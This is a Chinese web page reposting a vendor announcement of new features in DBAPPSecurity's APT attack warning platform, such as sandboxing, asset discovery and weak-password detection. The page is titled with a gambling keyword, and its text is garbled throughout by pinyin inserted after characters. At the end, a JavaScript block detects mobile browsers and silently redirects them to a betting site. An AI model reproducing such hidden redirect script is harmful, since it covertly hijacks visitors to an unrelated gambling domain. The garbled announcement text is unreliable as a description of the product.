mg游戏推荐

安恒信息APT攻击预警平台重磅发布新版本

2020-08-21 11:15:14 infoadmin 441



安恒信息APT攻击预警平台重磅发布新版本了!!!

听说这次迭代,很给力!


动态沙箱分析、红队典型攻击检测、攻击者视角分析、风险调查取证等关键技术基础上,历经多场实战检验,组协同研究院对检测策略持续优化升级,并新增资产识别和管理、Linux沙箱、弱口令检测配置、动态口令登录、代理自动更新等多项功能。


新版本上线,有哪些新变化呢?

标题.png
01

资产识别和管理


通过对流(liu)量(liang)中的IP地址、端口(kou)等进(jin)行统(tong)计,对网络资产进(jin)行主(zhu)动发现(xian)并快(kuai)速识别未(wei)登记资产。

1、可基于特定(ding)应用(yong)或服务对内部资产(chan)进行梳理(系(xi)统类(lei)型、IP、域(yu)名、端口(kou)等),查看资产(chan)端口(kou)暴(bao)露情(qing)况(kuang),特别是以非标端口(kou)提(ti)供的服务情(qing)况(kuang);

2、可深入识(shi)别运行在资产上的(de)中(zhong)间(jian)件、应用、技(ji)术架构的(de)详(xiang)细情况(类型、版本、服务(wu)名称等(deng))。


图片关键词


标题.png
02

多并发沙箱检测技术

1、平台采用(yong)多并发(fa)沙箱(xiang)检测技术(shu),集成主流操(cao)作系统winXPwin7win10Linux等多种检测(ce)环境

2、新增(zeng)PS1ELF等格(ge)式(shi)文件的动态(tai)检测


标题.png
03

检测模型丰富


1、ARP欺骗(pian):安恒APT预警平台根(gen)据网(wang)(wang)络(luo)内(nei)MAC与IP地(di)址的绑定关系,分析网(wang)(wang)络(luo)内(nei)的ARP流(liu)量,判断ARP应答包中的IP和MAC地(di)址是否匹配(pei);通过(guo)确认(ren)网(wang)(wang)络(luo)内(nei)主机的IP与MAC绑定关系,来提(ti)高检测精准性

2、弱口令检测:

支持自定(ding)义弱口令(ling)(ling)规则配(pei)置(最短口令(ling)(ling)长度、最少字符类型数),自定(ding)义新增弱密(mi)码库及(ji)其(qi)检测类型

支持自定义HTTP登(deng)录行为关键字,丰(feng)富(fu)HTTP弱口令检测模型

支持对(dui)HTTP协议请(qing)求头中(zhong)用户认(ren)证弱(ruo)口(kou)令(ling)、对(dui)JSON格(ge)式(逗号(hao)分割和(he)冒号(hao)区分键值)的(de)用户信息(xi)提(ti)取和(he)弱(ruo)口(kou)令(ling)、明文口(kou)令(ling)和(he)MD5加密口(kou)令(ling)碰撞的(de)弱(ruo)口(kou)令(ling)、BASE64加密口(kou)令(ling)的(de)弱(ruo)口(kou)令(ling)等进行检(jian)测

3、自(zi)定义(yi)规(gui)则模(mo)型:丰富自(zi)定义(yi)规(gui)则模(mo)型,支持按统计来源(yuan)、访问次数和(he)周期等参数自(zi)定义(yi)周期统计类规(gui)则

4、针(zhen)对攻防演练,持续新增(zeng)并优(you)化多条(tiao)漏洞(dong)利用检(jian)测规则,如Apache Struct2高危漏洞(dong)

5、新增智能语义分析检测脚本(ben)文件上传,如jsp脚本(ben)


标题.png
04

协议解析和数据外送


1、新增(zeng)250多种应(ying)用(yong)识别能力(li),并(bing)支持将新增(zeng)的会话应(ying)用(yong)数据(ju)发送(song)到大数据(ju)平台

2、新(xin)增SSL 3.0版本RSA解密,并(bing)支持对SSL流(liu)量进行审计(ji),将审计(ji)数(shu)据外送到大(da)数(shu)据平台

3、支(zhi)持对NETFLOW流(liu)量进(jin)行解析并将审(shen)计数据外送到大数据平台

4、风险(xian)通知新增json格式,支持直接将风险(xian)数(shu)(shu)据发(fa)送到大数(shu)(shu)据平(ping)台,无需(xu)中转



标题.png
05

配置优化与用户管理


1、新增(zeng)常规协(xie)议自动(dong)识别功能(neng),包括FTP/IMAP/SMTP/POP3/SSL/SMB/RDP等;可自定义是(shi)否启(qi)用该功能(neng)

2、支持自定义NAT转(zhuan)换(huan)前的(de)IP字段名和字段位置

3、新增IDS规则综合(he)查询功(gong)能(neng),支持自定义启用(yong)/禁用(yong)规则和模(mo)糊查找

4、新(xin)增飞天诚信动态口令(ling)登录认证和管理功(gong)能,增强账号安全性(xing)能

5、云(yun)环境下流量代理部署时(shi),支持AGENT自动(dong)更新

6、新增导航页语(yu)音告(gao)警播报功能,播报风(feng)险类别、风(feng)险级别、攻击状(zhuang)态、客(ke)户网络(luo)等(deng)可自定义

图片关键词

安恒APT攻击预(yu)警(jing)平台能够发现(xian)已知或未知威胁,平台的(de)实时监控能力能够捕获并分析文档或程序的(de)威胁性,并能够对邮(you)件投递、漏洞利(li)用(yong)、安装植入、回连控制等各个(ge)阶段关联的(de)木马等恶(e)意样本进行强有力的(de)监测。

同(tong)时,平台(tai)根据双向流量分析(xi)、智能的(de)(de)(de)机器学习(xi)、高效的(de)(de)(de)沙(sha)箱动态分析(xi)、丰富的(de)(de)(de)特征库(ku)、全(quan)面的(de)(de)(de)检(jian)测(ce)策(ce)略、海量的(de)(de)(de)威胁情报(bao)等,对网络流量进(jin)行深度分析(xi)。检(jian)测(ce)能力完整覆盖整个APT攻击链,有(you)效发(fa)现APT攻击、未(wei)知威胁及用(yong)户关心(xin)的(de)网(wang)络安全事件。

本文转自《安恒信息合(he)作伙伴中心》

var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();